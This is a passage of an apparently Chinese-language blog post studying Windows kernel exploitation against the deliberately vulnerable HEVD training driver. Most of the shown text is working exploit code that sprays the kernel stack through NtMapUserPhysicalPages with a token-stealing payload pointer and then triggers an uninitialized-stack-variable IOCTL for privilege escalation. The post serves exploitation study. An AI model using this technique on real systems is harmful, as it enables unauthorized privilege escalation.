class="string">"\t\t\t[+] ZwDuplicateToken: 0x%p\n"</span>, ZwDuplicateToken);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    PsGetCurrentProcess = (PsGetCurrentProcess_t)GetProcAddress(hKernelInUserMode, <span class="string">"PsGetCurrentProcess"</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!PsGetCurrentProcess) &#123;</span><br><span class="line">        DEBUG_ERROR(<span class="string">"\t\t\t[-] Failed Resolving PsGetCurrentProcess: 0x%X\n"</span>, GetLastError());</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        PsGetCurrentProcess = (PsGetCurrentProcess_t)((ULONG)PsGetCurrentProcess - (ULONG)hKernelInUserMode);</span><br><span class="line">        PsGetCurrentProcess = (PsGetCurrentProcess_t)((ULONG)PsGetCurrentProcess + (ULONG)KernelBaseAddressInKernelMode);</span><br><span class="line">        DEBUG_INFO(<span class="string">"\t\t\t[+] PsGetCurrentProcess: 0x%p\n"</span>, PsGetCurrentProcess);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    ZwSetInformationProcess = (ZwSetInformationProcess_t)GetProcAddress(hKernelInUserMode, <span class="string">"ZwSetInformationProcess"</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!ZwSetInformationProcess) &#123;</span><br><span class="line">        DEBUG_ERROR(<span class="string">"\t\t\t[-] Failed Resolving ZwSetInformationProcess: 0x%X\n"</span>, GetLastError());</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        ZwSetInformationProcess = (ZwSetInformationProcess_t)((ULONG)ZwSetInformationProcess - (ULONG)hKernelInUserMode);</span><br><span class="line">        ZwSetInformationProcess = (ZwSetInformationProcess_t)((ULONG)ZwSetInformationProcess + (ULONG)KernelBaseAddressInKernelMode);</span><br><span class="line">        DEBUG_INFO(<span class="string">"\t\t\t[+] ZwSetInformationProcess: 0x%p\n"</span>, ZwSetInformationProcess);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    ZwClose = (ZwClose_t)GetProcAddress(hKernelInUserMode, <span class="string">"ZwClose"</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!ZwClose) &#123;</span><br><span class="line">        DEBUG_ERROR(<span class="string">"\t\t\t[-] Failed Resolving ZwClose: 0x%X\n"</span>, GetLastError());</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        ZwClose = (ZwClose_t)((ULONG)ZwClose - (ULONG)hKernelInUserMode);</span><br><span class="line">        ZwClose = (ZwClose_t)((ULONG)ZwClose + (ULONG)KernelBaseAddressInKernelMode);</span><br><span class="line">        DEBUG_INFO(<span class="string">"\t\t\t[+] ZwClose: 0x%p\n"</span>, ZwClose);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    HeapFree(GetProcessHeap(), <span class="number">0</span>, (LPVOID)pSystemModuleInformation);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (hNtDll) &#123;</span><br><span class="line">        FreeLibrary(hNtDll);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (hKernelInUserMode) &#123;</span><br><span class="line">        FreeLibrary(hKernelInUserMode);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    hNtDll = <span class="literal">NULL</span>;</span><br><span class="line">    hKernelInUserMode = <span class="literal">NULL</span>;</span><br><span class="line">    pSystemModuleInformation = <span class="literal">NULL</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">DWORD WINAPI <span class="title">UninitializedStackVariableThread</span><span class="params">(LPVOID Parameter)</span> </span>&#123;</span><br><span class="line">    UINT32 i = <span class="number">0</span>;</span><br><span class="line">    ULONG BytesReturned;</span><br><span class="line">    HANDLE hFile = <span class="literal">NULL</span>;</span><br><span class="line">    ULONG MagicValue = <span class="number">0xBAADF00D</span>;</span><br><span class="line">    PULONG StackSprayBuffer = <span class="literal">NULL</span>;</span><br><span class="line">    LPCSTR FileName = (LPCSTR)DEVICE_NAME;</span><br><span class="line">    NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;</span><br><span class="line">    PVOID EopPayload = &amp;TokenStealingPayloadDuplicateToken;</span><br><span class="line">    SIZE_T StackSprayBufferSize = <span class="number">1024</span> * <span class="keyword">sizeof</span>(ULONG_PTR);</span><br><span class="line"></span><br><span class="line">    __try &#123;</span><br><span class="line">        DEBUG_MESSAGE(<span class="string">"\t[+] Setting Thread Priority\n"</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) &#123;</span><br><span class="line">            DEBUG_ERROR(<span class="string">"\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            DEBUG_INFO(<span class="string">"\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n"</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Get the device handle</span></span><br><span class="line">        DEBUG_MESSAGE(<span class="string">"\t[+] Getting Device Driver Handle\n"</span>);</span><br><span class="line">        DEBUG_INFO(<span class="string">"\t\t[+] Device Name: %s\n"</span>, FileName);</span><br><span class="line"></span><br><span class="line">        hFile = GetDeviceHandle(FileName);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (hFile == INVALID_HANDLE_VALUE) &#123;</span><br><span class="line">            DEBUG_ERROR(<span class="string">"\t\t[-] Failed Getting Device Handle: 0x%X\n"</span>, GetLastError());</span><br><span class="line">            <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            DEBUG_INFO(<span class="string">"\t\t[+] Device Handle: 0x%X\n"</span>, hFile);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        DEBUG_MESSAGE(<span class="string">"\t[+] Setting Up Vulnerability Stage\n"</span>);</span><br><span class="line"></span><br><span class="line">        DEBUG_INFO(<span class="string">"\t\t[+] Allocating Memory For Buffer\n"</span>);</span><br><span class="line"></span><br><span class="line">        StackSprayBuffer = (PULONG)HeapAlloc(GetProcessHeap(),</span><br><span class="line">                                             HEAP_ZERO_MEMORY,</span><br><span class="line">                                             StackSprayBufferSize);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (!StackSprayBuffer) &#123;</span><br><span class="line">            DEBUG_ERROR(<span class="string">"\t\t\t[-] Failed To Allocate Memory: 0x%X\n"</span>, GetLastError());</span><br><span class="line">            <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            DEBUG_INFO(<span class="string">"\t\t\t[+] Memory Allocated: 0x%p\n"</span>, StackSprayBuffer);</span><br><span class="line">            DEBUG_INFO(<span class="string">"\t\t\t[+] Allocation Size: 0x%X\n"</span>, StackSprayBufferSize);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        DEBUG_INFO(<span class="string">"\t\t[+] Preparing Buffer Memory Layout\n"</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">//填充buffer</span></span><br><span class="line">        <span class="keyword">for</span>(i = <span class="number">0</span>; i &lt; StackSprayBufferSize / <span class="keyword">sizeof</span>(ULONG_PTR); i++) &#123;</span><br><span class="line">            StackSprayBuffer[i] = (ULONG)EopPayload;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        DEBUG_INFO(<span class="string">"\t\t[+] EoP Payload: 0x%p\n"</span>, EopPayload);</span><br><span class="line">        <span class="comment">//找到NtMapUserPhysicalPages API的地址，后面要调用</span></span><br><span class="line">        ResolveKernelAPIs();</span><br><span class="line"></span><br><span class="line">        DEBUG_INFO(<span class="string">"\t\t[+] Spraying the Kernel Stack\n"</span>);</span><br><span class="line">        DEBUG_MESSAGE(<span class="string">"\t[+] Triggering Use of Uninitialized Stack Variable\n"</span>);</span><br><span class="line"></span><br><span class="line">        OutputDebugString(<span class="string">"****************Kernel Mode****************\n"</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// HackSys Extreme Vulnerable driver itself provides a decent interface</span></span><br><span class="line">        <span class="comment">// to spray the stack using Stack Overflow vulnerability. However, j00ru</span></span><br><span class="line">        <span class="comment">// on his blog disclosed a Windows API that can be used to spray stack up to</span></span><br><span class="line">        <span class="comment">// 1024*sizeof(ULONG_PTR) bytes (http://j00ru.vexillium.org/?p=769). Since,</span></span><br><span class="line">        <span class="comment">// it's a Windows API and available on Windows by default, I decided to use</span></span><br><span class="line">        <span class="comment">// it instead of this driver's Stack Overflow interface.</span></span><br><span class="line">        <span class="comment">//喷射kernel stack</span></span><br><span class="line">        NtMapUserPhysicalPages(<span class="literal">NULL</span>, <span class="number">1024</span>, StackSprayBuffer);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Kernel Stack should not be used for anything else as it</span></span><br><span class="line">        <span class="comment">// will corrupt the current sprayed state. So, we will directly</span></span><br><span class="line">        <span class="comment">// trigger the vulnerability without putting any Debug prints.</span></span><br><span class="line">        <span class="comment">//触发漏洞</span></span><br><span class="line">        DeviceIoControl(hFile,</span><br><span class="line">                        HACKSYS_EVD_IOCTL_UNINITIALIZED_STACK_VARIABLE,</span><br><span class="line">                        (LPVOID)&amp;MagicValue,</span><br><span class="line">                        <span class="number">0</span>,</span><br><span class="line">                        <span class="literal">NULL</span>,</span><br><span class="line">                        <span class="number">0</span>,</span><br><span class="line">                        &amp;BytesReturned,</span><br><span class="line">                        <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line">        OutputDebugString(<span class="string">"****************Kernel Mode****************\n"</span>);</span><br><span class="line"></span><br><span class="line">        HeapFree(GetProcessHeap(), <span class="number">0</span>, (LPVOID)StackSprayBuffer);</span><br><span class="line"></span><br><span class="line">        StackSprayBuffer = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    __except (EXCEPTION_EXECUTE_HANDLER) &#123;</span><br><span class="line">        DEBUG_ERROR(<span class="string">"\t\t[-] Exception: 0x%X\n"</span>, GetLastError());</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> EXIT_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="0x05-参考"><a href="#0x05-参考" class="headerlink" title="0x05: 参考"></a>0x05: 参考</h4><p><a href="http://paper.seebug.org/200/" target="_blank" rel="noopener">HEVD Kernel Exploitation – Uninitialized Stack &amp; Heap By k0shl</a><br><a href="http://j00ru.vexillium.org/?p=769" target="_blank" rel="noopener">nt!NtMapUserPhysicalPages and Kernel Stack-Spraying Techniques</a></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2017/02/04/Windows-Kernel-Exploit-Study-3/">Windows-Kernel-Exploit-Study(3)</a></p>
        <p><span>文章作者:</span><a href="/" title="访问 muhe 的个人博客">muhe</a></p>
        <p><span>发布时间:</span>2017年02月04日 - 20时37分</p>
        <p><span>最后更新:</span>2017年02月04日 - 21时37分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2017/02/04/Windows-Kernel-Exploit-Study-3/" title="Windows-Kernel-Exploit-Study(3)">http://o0xmuhe.me/2017/02/04/Windows-Kernel-Exploit-Study-3/</a>
            <span class="copy-path" data-clipboard-text="原文: http://o0xmuhe.me/2017/02/04/Windows-Kernel-Exploit-Study-3/　　作者: muhe" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" target="_blank" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a href="/2017/02/08/Adding-your-own-syscall-in-linux-kernel/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          Adding your own syscall in linux kernel
        
      </div>
    </a>
  
  
    <a href="/2017/01/30/Linux%20socket%E8%BF%9B%E7%A8%8B%E9%97%B4%E9%80%9A%E4%BF%A1%E5%8F%8A%E5%BA%94%E7%94%A8/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">Linux socket进程间通信及应用</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#0x00"><span class="toc-number">1.</span> <span class="toc-text">0x00:</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x01-先来看vuln代码"><span class="toc-number">2.</span> <span class="toc-text">0x01:先来看vuln代码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x02-调试"><span class="toc-number">3.</span> <span class="toc-text">0x02:调试</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x03-利用思路"><span class="toc-number">4.</span> <span class="toc-text">0x03:利用思路</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x04-Exploit分析"><span class="toc-number">5.</span> <span class="toc-text">0x04:Exploit分析</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x05-参考"><span class="toc-number">6.</span> <span class="toc-text">0x05: 参考</span></a></li></ol>
</div>
<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
    }
</script>





<div class="bdsharebuttonbox">
	<a href="#" class="fx fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
	<a href="#" class="fx fa-weixin bds_weixin" data-cmd="weixin" title="分享到微信"></a>
	<a href="#" class="fx fa-qq bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
	<a href="#" class="fx fa-facebook-official bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
	<a href="#" class="fx fa-twitter bds_twi" data-cmd="twi" title="分享到Twitter"></a>
	<a href="#" class="fx fa-linkedin bds_linkedin" data-cmd="linkedin" title="分享到linkedin"></a>
	<a href="#" class="fx fa-files-o bds_copy" data-cmd="copy" title="分享到复制网址"></a>
</div>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>




    
        <section id="comments">
  <div id="disqus_thread"></div>
    <script type="text/javascript">
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'o0xmuhe'; // required: replace example with your forum shortname

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
      var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
  </script>
  <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" target="_blank" rel="noopener">comments powered by Disqus.</a></noscript>
</section>
    



    <div class="scroll" id="post-nav-button">
        
            <a href="/2017/02/08/Adding-your-own-syscall-in-linux-kernel/" title="上一篇: Adding your own syscall in linux kernel">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/2017/01/30/Linux%20socket%E8%BF%9B%E7%A8%8B%E9%97%B4%E9%80%9A%E4%BF%A1%E5%8F%8A%E5%BA%94%E7%94%A8/" title="下一篇: Linux socket进程间通信及应用">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/11/15/frida-gum%E4%BB%A3%E7%A0%81%E9%98%85%E8%AF%BB/">frida-gum代码阅读笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/24/Linux-Kernel-%E7%BC%96%E8%AF%91%E8%B8%A9%E5%9D%91/">Linux Kernel 编译踩坑</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/10/17/Debug-macOS-Kernel/">Debug macOS Kernel</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/26/Snell-auto-install-cript/">Snell auto install cript</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/20/macOS-IPC-Study-basic-2/">macOS IPC Study Notes</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/09/Uninitialised-Objective-C-Pointer-Vulnerability-Analysis-CVE-2018-4196/">Uninitialised Objective-C Pointer Vulnerability Analysis (CVE-2018-4196)</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/02/CVE-2019-8604-analysis/">CVE-2019-8604 analysis</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/22/Bindiff5-0-Could-not-create-file-handler-fix/">Bindiff5.0 Could not create file handler fix</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/20/macOS-IPC-Study-basic/">macOS IPC Study basic</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/14/Adobe-Acrobat-Reader-getUIPerms-setUIPerms-Unicode-String-Out-of-bound-Read/">Adobe Acrobat Reader getUIPerms/setUIPerms  Unicode String Out-of-bound Read</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/10/Apple-IPC-DO-Basic/">Apple IPC : DO Basic</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/16/Adobe-Acrobat-DC-Pro-touchup-UaF/">Adobe Acrobat DC Pro touchup UaF</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/09/IDA%E8%87%AA%E5%8A%A8%E5%8C%96%E5%88%86%E6%9E%90/">IDA自动化分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/19/CVE-2017-2541-XGetWindowMovementGroup-stackoverflow/">CVE-2017-2541 __XGetWindowMovementGroup stackoverflow</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/19/CVE-2017-2540-XGetConnectionPSN-info-leak/">CVE-2017-2540 _XGetConnectionPSN info leak</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/14/find-macOS-service-and-it-s-plist-file/">find macOS service and it's plist file</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/15/Adobe-Acrobat-DC-Pro-OOB-CVE-2019-7813/">Adobe Acrobat DC Pro OOB(CVE-2019-7813)</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/10/macOS-on-ESXi/">macOS on ESXi</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/20/CVE-2017-2547-%E5%88%86%E6%9E%90/">CVE-2017-2547 分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/17/NULL/">NULL</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/12/CVE-2019-7125-PoC/">CVE-2019-7125 PoC</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/06/CVE-2018-4990-analysis/">CVE-2018-4990 analysis</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/06/CVE-2016-4622-analysis/">CVE-2016-4622  analysis</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/24/CVE-2017-2536-analysis/">CVE-2017-2536 analysis</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/12/CVE-2018-12794-%E5%88%86%E6%9E%90/">CVE-2018-12794 分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/04/%E4%BD%BF%E7%94%A8Frida%E8%BE%85%E5%8A%A9%E9%80%86%E5%90%91/">使用Frida辅助逆向</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/31/Webkit%E7%BC%96%E8%AF%91%E8%B8%A9%E5%9D%91%E8%AE%B0%E5%BD%95/">Webkit编译踩坑记录</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/25/%E9%80%86%E5%90%91%E5%8D%8F%E4%BD%9C%E4%B9%8BIDA%E6%8F%92%E4%BB%B6IDArling/">逆向协作之IDA插件IDArling</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/13/%E7%94%B1CVE-2018-12831%E5%BC%95%E5%8F%91%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%9D%E8%80%83/">由CVE-2018-12831引发的一些思考</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/18/TFC%E6%B8%B8%E8%AE%B0/">TFC游记</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/08/Hello-PANDA/">Hello PANDA</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/07/UAF-analysis-using-pykd/">UAF analysis : using pykd</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/05/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%9F%B9%E5%85%BB%E8%AE%A1%E5%88%92/">代码审计培养计划</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/08/13/%E9%A3%9E%E6%89%AC%E5%8E%86%E9%99%A9%E8%AE%B0/">飞扬历险记</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/06/16/linux-code-inject/">linux code inject</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/06/16/%E6%AF%94%E8%B5%9B%E8%BF%90%E7%BB%B4%E6%9D%82%E8%AE%B0/">比赛运维杂记</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/06/09/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB-IFuzzer-An-Evolutionary-Interpreter-Fuzzer-using-Genetic-Programming/">论文阅读<IFuzzer: An Evolutionary Interpreter Fuzzer using Genetic Programming></a></li><li class="post-list-item"><a class="post-list-link" href="/2018/06/03/%E9%81%97%E4%BC%A0%E7%AE%97%E6%B3%95%E5%88%9D%E7%AA%A5/">遗传算法初窥</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/05/29/Antlr4%E5%88%9D%E4%BD%93%E9%AA%8C/">Antlr4初体验</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/04/19/mips%E7%A8%8B%E5%BA%8F%E8%B0%83%E8%AF%95%E7%8E%AF%E5%A2%83%E6%8A%98%E8%85%BE/">mips程序调试环境折腾</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/03/14/%E6%8B%AF%E6%95%91macOS-High-sierra%E7%9A%84%E7%A1%AC%E7%9B%98%E7%A9%BA%E9%97%B4/">拯救macOS High sierra的硬盘空间</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/16/Symbolic-Execution%E5%AD%A6%E4%B9%A0/">Symbolic Execution学习</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/11/LL-LR-SLR-LALR%E5%82%BB%E5%82%BB%E5%88%86%E4%B8%8D%E6%B8%85/">LL LR SLR LALR傻傻分不清</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/20/compiler%E5%AD%A6%E4%B9%A0/">compiler学习</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/15/Unicorn-Engine%E5%88%9D%E4%BD%93%E9%AA%8C/">Unicorn Engine初体验</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/06/flex-bison%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0/">flex_bison读书笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/30/Python%E6%8C%87%E5%AE%9A%E6%A6%82%E7%8E%87%E8%8E%B7%E5%8F%96%E9%9A%8F%E6%9C%BA%E5%85%83%E7%B4%A0/">Python指定概率获取随机元素</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/01/Hello-World%E5%8D%87%E7%BA%A7%E7%89%88/">Hello World升级版</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/13/babydriver-writeup/">babydriver writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/05/OpenGrok%E6%90%AD%E5%BB%BA/">OpenGrok搭建</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/06/30/%E7%BC%96%E8%AF%91%E5%8E%9F%E7%90%86%E5%AD%A6%E4%B9%A0/">编译原理学习</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/06/28/TrendMicro-CTF-2017-Reverse300/">TrendMicro CTF 2017 Reverse300</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/06/19/Final/">Final</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/05/29/pwnhub%E6%9D%AFCUIT%E7%AC%AC%E5%8D%81%E4%B8%89%E5%B1%8A%E6%A0%A1%E8%B5%9Bpwn%E5%87%BA%E9%A2%98%E5%8F%8A%E8%BF%90%E7%BB%B4%E5%BF%83%E5%BE%97/">pwnhub杯CUIT第十三届校赛pwn出题及运维心得</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/05/08/SSCTF-2017%E9%83%A8%E5%88%86Writeup/">SSCTF-2017部分Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/04/22/360%E6%98%A5%E7%A7%8BCTF-pwn/">360春秋CTF--pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/04/06/Linux-Kernel-Exploit-4-beginners/">Linux Kernel Exploit 4 beginners</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/15/NJCTF-2017%E9%83%A8%E5%88%86wp/">NJCTF-2017部分wp</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/06/SECCON-2016-jmper/">SECCON-2016 jmper</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/04/codegate2017-angrybird/">codegate2017-angrybird</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/02/27/LLVM-Study-Log/">LLVM Study Log</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/02/16/ichunqiu-CTF-2017-2/">ichunqiu-CTF-2017-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/02/08/Adding-your-own-syscall-in-linux-kernel/">Adding your own syscall in linux kernel</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/02/04/Windows-Kernel-Exploit-Study-3/">Windows-Kernel-Exploit-Study(3)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/30/Linux%20socket%E8%BF%9B%E7%A8%8B%E9%97%B4%E9%80%9A%E4%BF%A1%E5%8F%8A%E5%BA%94%E7%94%A8/">Linux socket进程间通信及应用</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/28/%E9%97%B2%E8%A8%80%E7%A2%8E%E8%AF%AD/">闲言碎语</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/22/Have-fun-with-Blind-ROP/">Have fun with Blind ROP</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/20/Windows-Kernel-Exploit-Study-2/">Windows Kernel Exploit Study(2)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/19/Windows-Kernel-Exploit-Study-1/">Windows Kernel Exploit Study(1)</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/24/what-DynELF-does-basically/">what DynELF does basically</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/17/fuzzing-with-peach-Just-a-toy/">fuzzing with peach(Just a toy)</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/25/PlaidCTF-2016-butterfly/">PlaidCTF 2016 butterfly</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/21/Have-fun-with-glibc%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86/">Have fun with glibc内存管理</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/10/linux-%E4%B8%8B%E8%B5%B7shell%E5%A4%B1%E8%B4%A5%E7%9A%84%E5%88%86%E6%9E%90/">linux 下起shell失败的分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/07/Baiudu%E6%9D%AF-pwn%E4%B8%93%E5%9C%BA%E8%AE%B0%E5%BD%95/">Baiudu杯 pwn专场记录</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/10/29/how-to-compile-WinAFL/">how to compile WinAFL</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/10/25/yocto-writeup/">yocto writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/10/11/HITCON-2016-Quals-SecretHolder/">HITCON-2016-Quals-SecretHolder</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/09/27/BCTF-cloud/">BCTF--cloud</a></li><li class="post-list-item"><a class="post-list-link" 